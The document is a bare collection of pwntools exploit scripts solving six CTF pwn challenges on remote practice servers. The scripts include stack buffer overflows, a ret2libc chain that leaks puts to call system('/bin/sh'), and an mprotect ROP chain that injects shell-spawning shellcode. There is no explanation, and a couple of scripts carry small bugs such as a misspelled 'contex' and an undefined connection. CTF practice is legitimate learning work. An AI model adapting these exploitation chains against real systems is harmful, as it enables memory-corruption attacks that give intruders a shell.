0x01 rip
from pwn import*
p = remote('node3.buuoj.cn',27511)
payload = 'a'*23+p64(0x401198)+p64(0x401186)
p.sendline(payload)
p.interactive()
0x02 warmup_csaw_2016
from pwn import *
p = remote('node3.buuoj.cn', 28647)
p.recvuntil(':')
s = p.recv()[0:8]
address = int(s, 16)
p.sendline('a'*64 + p64(address))
p.interactive()
0x03 pwn1_sctf_2016
from pwn import *
p = remote('node3.buuoj.cn', 28115)
get_flag = 0x08048F0D
p.sendline('I'*20+'A'*4+p32(get_flag))
p.interactive()
0x04 ciscn_2019_n_1
from pwn import *
p = remote('node3.buuoj.cn',26246)
p.recvuntil("umber.\n")
p.sendline("a"*0x2C+p64(0x41348000))
p.interactive()
0x05 [OGeek2019]babyrop
from pwn import *
contex.log_level = "debug"
elf = ELF('./babyrop', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
addr_main = 0x08048825
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']
pd = '\x00'
pd += '\xff' * 8
p.send(pd)
p.recvuntil('Correct\n')
payload = 'a' * 0xeb
payload += p32(plt_puts)
payload += p32(addr_main)
payload += p32(got_puts)
p.send(payload)
addr_puts = u32(p.recv(4))
libcbase = addr_puts - libc.sym['puts']
addr_system = libcbase + libc.sym['system']
addr_bin_sh = libcbase + libc.search('/bin/sh').next()
payload = '\x00'
payload += '\xff' * 8
p.send(payload)
p.recvuntil('Correct\n')
payload = 'a' * 0xeb
payload += p32(addr_system)
payload += p32(0)
payload += p32(addr_bin_sh)
p.send(payload)
p.interactive()
0x06 get_started_3dsctf_2016
from pwn import *
context(log_level = 'debug')
p = remote('node3.buuoj.cn', 25891)
ret = 0x08048A19
elf = ELF("./pwn")
pop3_ret = 0x80483b8
mem_addr = 0x80EB000
mem_size = 0x1000
mem_proc = 0x7
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
payload = 'a'*0x38+p32(mprotect_addr)+p32(pop3_ret)+p32(mem_addr)+p32(mem_size)+p32(mem_proc)+p32(read_addr)+p32(pop3_ret)+p32(0)+p32(mem_addr)+p32(0x100)+p32(mem_addr)
p.sendline(payload)
payload = asm(shellcraft.sh(), arch='i386', os='linux')
p.sendline(payload)
p.interactive()
